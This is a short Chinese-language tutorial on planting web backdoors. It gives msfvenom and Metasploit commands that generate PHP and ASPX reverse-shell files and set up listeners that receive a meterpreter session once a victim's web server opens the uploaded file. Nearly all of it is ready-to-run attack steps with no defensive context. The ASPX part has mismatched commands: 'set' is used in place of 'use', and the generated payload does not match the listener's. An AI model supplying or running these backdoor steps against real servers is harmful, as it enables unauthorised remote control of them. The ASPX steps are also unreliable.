利用web后门取得meterpreter的两种方式

web后门是大家常用的后门之一,现介绍两种web后门,方便各位用来获得meterpreter,一种是php反弹shell木马,另一种是aspx反弹shell木马。

一、php反弹shell

利用msfvenom工具生成php反弹shell:

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php

-p 表示使用类型为payloads

-f  表示输出的文件格式

接着,在msf中设置监听:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 172.17.17.128
run

一旦攻击对象通过浏览器点开shell.php文件,msf会获得返回的meterpreter,此时攻击成功。

2、aspx反弹shell

aspx meterpreter后门与上述后门类似,首先使用下列命令调用漏洞模块,并设置相关参数

use windows/shell_reverse_tcp
set lhost 172.17.17.128
set lport 4444
generate -h 查看该模块使用方法
generate -f aspx

此时会生成一段aspx代码,把代码复制到一个文档中,命名shell.aspx。

在msf中设置监听:

set exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.17.17.128
set lport 4444
run

最后,将shell.aspx传入web服务器目录下,在浏览器中打开该文件,稍等片刻便能取得meterpreter。

你可能感兴趣的:(利用web后门取得meterpreter的两种方式)